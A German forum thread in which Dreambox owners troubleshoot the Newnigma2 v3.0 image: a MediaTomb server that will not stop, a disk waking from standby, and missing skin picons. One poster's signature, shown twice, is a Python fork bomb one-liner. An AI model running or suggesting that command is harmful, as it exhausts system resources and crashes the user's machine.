DM800: Newnigma2 v3.0

    • Irgendwie bekomm ich den MediaTomb nicht mehr beendet.

      Er sagt mir zwar im telnet shutting down, aber läuft weiter.

      Zweitens ist mir gerade aufgefallen wenn ich Umschalte läuft die Platte an.

      Obwohl die Skin Picons auf dem USB Stick sdb1 liegen.

      Kann dies evtl was mit diesem USB Stick mounten zu tun haben, das er den auf media/hdd mounten will?

      Wobei dies noch nicht erklärt das die HDD im Standby auch los legt.
      Dreambox 920UHD
      2x Dreambox 7020HD
    • Original von kati910
      /etc/init.d/mtb start startet den
      /etc/init.d/mtb stop kannste dir ausmalen was das macht :D


      Ja schön wärs :)

      Erst hab ich einen Tag gebraucht den zum laufen zu bringen und nun bekomm ich den nicht mehr gestoppt :(

      Stopping upnp media server: mediatombrm: cannot remove '/var/run/mediatomb.pid': No such file or directory
      Dreambox 920UHD
      2x Dreambox 7020HD
    • Also für fehlerhafte bedienung bin ich net zuständig.

      Quellcode

      1. *****************************
      2. * http://www.newnigma2.to *
      3. *****************************
      4. * the next step is done *
      5. *****************************
      6. OpenDreambox
      7. dm500hd login: root
      8. Password:
      9. root@dm500hd:~# /etc/init.d/mtb start
      10. Starting upnp media server: mediatomb.
      11. root@dm500hd:~# /etc/init.d/mtb stop
      12. Stopping upnp media server: mediatomb.
      13. root@dm500hd:~#
      Alles anzeigen


      Oder reboote die box und versuchs nochmal.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • *****************************
      * newnigma2.to *
      *****************************
      * the next step is done *
      *****************************
      OpenDreambox
      dm800 login: root
      Password:
      root@dm800:~# /etc/init.d/mtb stop
      Stopping upnp media server: mediatombrm: cannot remove '/var/run/mediatomb.pid':
      No such file or directory
      .
      root@dm800:~#
      root@dm800:~# /etc/init.d/mtb start
      Starting upnp media server: mediatomb.
      root@dm800:~# /etc/init.d/mtb stop
      Stopping upnp media server: mediatomb.
      root@dm800:~#

      Das Bezweifel ich auch ziemlich die fehlerhafte Bedienung :)

      Ich habe mit dem Befehl mediatomb wie in der Anleitung gestartet, wenn ich mit deinem Befehl nun Stoppe, kommt die Fehlermeldung und läuft weiter.

      Wenn ich mit deinem Befehl starte und stoppe, kommt zwar keine Fehlermeldung wie du siehst, aber der Server läuft trotzdem weiter.

      PS: Bin grad am neustarten :) mal sehen ob er dann weg ist.

      Auch nach einem neustart die gleiche Fehlermeldung und läuft immer noch.
      Dreambox 920UHD
      2x Dreambox 7020HD

      Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von linus76 ()

    • Also ich kann bei dem ganzen irgendwie keine Regelmäßigkeit feststellen bzw woran es liegt.

      Ich kann nur sagen gestern Abend lief die Platte plötzlich und die Box war im Standby.

      Habe die Platte dann manuell in den Standby und die Box dann auch, danach lief kurz darauf die Platte wieder an. Also nochmal in den Standby die Platte und dann die Box. Dort blieb sie dann erst mal.

      Darauf hab ich dann mit der DM500HD die Platte wieder kurz erweckt, und sie ging anschließend auch wieder in den Standby, jedoch heute morgen lief das Teil wieder.

      Vorhin habe ich eben Festgestellt das die Platte beim Umschalten anläuft, nachdem sie wieder im Standby war nochmal probiert, aber diesmal blieb die Platte im Standby beim Umschalten. Also nicht so wirklich Aussagekräftig.

      Nun habe ich gerade die Box in den Standby, (Platte war schon) und dann mit Samba darauf zugegiffen, die Platte brauchte ziemlich lange zum Anlaufen, ging aber nach den 5min wieder in den Standby, jedoch nach 1min startete sie dann wieder obwohl kein zugriff mehr über Samba war und lief dann ca 10min bis die Platte wieder in Standby ging.

      Im Devicemanger ist sie übrigens auch nicht, war sie aber soweit ich mich erinnere noch nie, egal welches NewNigma es war und ich nutze seit über einem Jahr Newnigma.

      Probleme mit dem Standby hatte ich eigentlich noch nie bisher, und Samba und das Mounten einer 2ten Box war schon immer. Lediglich der MediaTomb ist neu, aber den bekomme ich momentan nicht mehr weg.

      Auch beim Mounten von der DM500 gab es Probleme das er einfach nicht auf die DM800 wollte und die DM500 schon mal mit drehenden Zahnrädern stehen blieb. Dies alles ging beim RC2 Tadellos.
      Dreambox 920UHD
      2x Dreambox 7020HD

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von linus76 ()

    • Original von nixkoenner
      Original von clarc
      ich hatte/habe genau das selbe problem mit dem image welches den "oe 1.6 kernel" nutzt und bin deshalb auf das ganz alte zurückgewechselt -- hatte eigentlich gehofft, dass sich mit dem V3 dieses problem nun löst -- kann das irgendwer bestätigen ?

      gruß


      nimm mal das aktuelle unstable von heute und schaumal ob es behoben ist wir haben da was
      gefunden


      leider keine verbesserung -- wenn ich die box runterfahre läuft die hdd (läuft sogar extra an, wenn se beim runterfahren im ruhezustand war), starte ich die box dann neu hört man, wie die hdd ausgeht... newnigma3 ist direkt im flash, also am multiboot kanns nicht liegen... hdd ist ne samsung spinpoint 500gb

      gruß

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von clarc ()

    • Original von clarc
      Original von nixkoenner
      Original von clarc
      ich hatte/habe genau das selbe problem mit dem image welches den "oe 1.6 kernel" nutzt und bin deshalb auf das ganz alte zurückgewechselt -- hatte eigentlich gehofft, dass sich mit dem V3 dieses problem nun löst -- kann das irgendwer bestätigen ?

      gruß


      nimm mal das aktuelle unstable von heute und schaumal ob es behoben ist wir haben da was
      gefunden


      leider keine verbesserung -- wenn ich die box runterfahre läuft die hdd (läuft sogar extra an, wenn se beim runterfahren im ruhezustand war), starte ich die box dann neu hört man, wie die hdd ausgeht... newnigma3 ist direkt im flash, also am multiboot kanns nicht liegen...

      gruß


      Bei mir auch so, nur halt mit dem Standby, die HDD ist aus und wenn ich in den Standby schalte läuft die Festplatte an :(

      @Xwolverine

      Ja der Prozess wird auch angezeigt. Bekomm den nicht mehr weg :)
      Dreambox 920UHD
      2x Dreambox 7020HD
    • Original von linus76
      Also ich kann bei dem ganzen irgendwie keine Regelmäßigkeit feststellen bzw woran es liegt.

      Ich kann nur sagen gestern Abend lief die Platte plötzlich und die Box war im Standby.

      Habe die Platte dann manuell in den Standby und die Box dann auch, danach lief kurz darauf die Platte wieder an. Also nochmal in den Standby die Platte und dann die Box. Dort blieb sie dann erst mal.

      Darauf hab ich dann mit der DM500HD die Platte wieder kurz erweckt, und sie ging anschließend auch wieder in den Standby, jedoch heute morgen lief das Teil wieder.

      Vorhin habe ich eben Festgestellt das die Platte beim Umschalten anläuft, nachdem sie wieder im Standby war nochmal probiert, aber diesmal blieb die Platte im Standby beim Umschalten. Also nicht so wirklich Aussagekräftig.

      Nun habe ich gerade die Box in den Standby, (Platte war schon) und dann mit Samba darauf zugegiffen, die Platte brauchte ziemlich lange zum Anlaufen, ging aber nach den 5min wieder in den Standby, jedoch nach 1min startete sie dann wieder obwohl kein zugriff mehr über Samba war und lief dann ca 10min bis die Platte wieder in Standby ging.

      Im Devicemanger ist sie übrigens auch nicht, war sie aber soweit ich mich erinnere noch nie, egal welches NewNigma es war und ich nutze seit über einem Jahr Newnigma.

      Probleme mit dem Standby hatte ich eigentlich noch nie bisher, und Samba und das Mounten einer 2ten Box war schon immer. Lediglich der MediaTomb ist neu, aber den bekomme ich momentan nicht mehr weg.

      Auch beim Mounten von der DM500 gab es Probleme das er einfach nicht auf die DM800 wollte und die DM500 schon mal mit drehenden Zahnrädern stehen blieb. Dies alles ging beim RC2 Tadellos.

      Warum bekommste den net wech sachmal so schwer ist das doch net reboot und gut kein gui restart.
      Der steht in keinem runlevel also ist der nach dem reboot nicht mehr am start.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von terra7
      Hallo,
      Erst einmal vielen Dank für das neue Image.
      Ich habe das gleiche Problem , meine Picons liegen auf USB . LCD Picons funzen ,Skin Picons nicht.

      Meine Picons heissen : Picon und PiconHD
      Im Vorgänger war alles ok

      mfg

      Ich hab die Ursache noch nicht ausmachen können.
      Picon Debug auf AN, es wird in /tmp ein missing-skin-hd-picons.txt angelegt:

      Inhalt:

      Brainfuck-Quellcode

      1. ServiceNameUpper: VOX HD
      2. ServiceReference: 1_0_19_EF11_421_1_C00000_0_0_0
      3. ServiceName: VOX HD
      4. ---------------------------------------------------
      5. ServiceNameUpper: KABEL EINS HD
      6. ServiceReference: 1_0_19_EF76_3F9_1_C00000_0_0_0
      7. ServiceName: kabel eins HD
      8. ---------------------------------------------------



      Original von linus76
      Obwohl die Skin Picons auf dem USB Stick sdb1 liegen.

      Das heißt, bei dir gehen die Skin Picons. Ich frag mich was ich anderst gemacht hab?

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von !NC ()

    • Original von terra7
      Ich habe das gleiche Problem , meine Picons liegen auf USB . LCD Picons funzen ,Skin Picons nicht.
      Meine Picons heissen : Picon und PiconHD


      ich hoffe, sie heissen richtig picon und piconHD
      auf gross-kleinschreibung achten!

      der stick(inhalt) sollte im verzeichnis autofs/UUID aufscheinen
    • Original von !NC


      Original von linus76
      Obwohl die Skin Picons auf dem USB Stick sdb1 liegen.

      Das heißt, bei dir gehen die Skin Picons. Ich frag mich was ich anderst gemacht hab?


      Ja laufen auch Problemlos. Die Skin Picons waren schon immer auf USB, ich hab einfach das Image neu gemacht, die Settings mit dem Configsaver wiederhergestellt, und darin war Automatisch der Pfad schon auf Upper USB Slot sdb1 und die Picons laufen.

      NEIN KEIN MULTIBOOT!

      PS:Kompletten Restart mach ich dann gleich, wenn der MediaTomb dann weg ist schau ich mal wie sich die Festplatte verhält.
      Dreambox 920UHD
      2x Dreambox 7020HD
    • Hab kein Multiboot.

      eviltrooper hatte doch recht.
      Scheinbar hab ich nen Knick in der Optik, hab 3d wohl auf die schnelle als hd interpretiert. Und die 3d Picons der SD-Skin geladen...

      Die HD-Picons kommen erst weiter unten in der Auswahl, aufgefallen ists mir durch den Ordner, der picon und nicht piconHD hieß.
    • Original von !NC
      Hab kein Multiboot.

      eviltrooper hatte doch recht.
      Scheinbar hab ich nen Knick in der Optik, hab 3d wohl auf die schnelle als hd interpretiert. Und die 3d Picons der SD-Skin geladen...

      Die HD-Picons kommen erst weiter unten in der Auswahl, aufgefallen ists mir durch den Ordner, der picon und nicht piconHD hieß.


      och dann ist ja alles halb so wild :)
    • Original von !NC
      Hab kein Multiboot.

      eviltrooper hatte doch recht.
      Scheinbar hab ich nen Knick in der Optik, hab 3d wohl auf die schnelle als hd interpretiert. Und die 3d Picons der SD-Skin geladen...

      Die HD-Picons kommen erst weiter unten in der Auswahl, aufgefallen ists mir durch den Ordner, der picon und nicht piconHD hieß.


      ich hab auch ewig gebraucht bis ich das gemerkt habe :D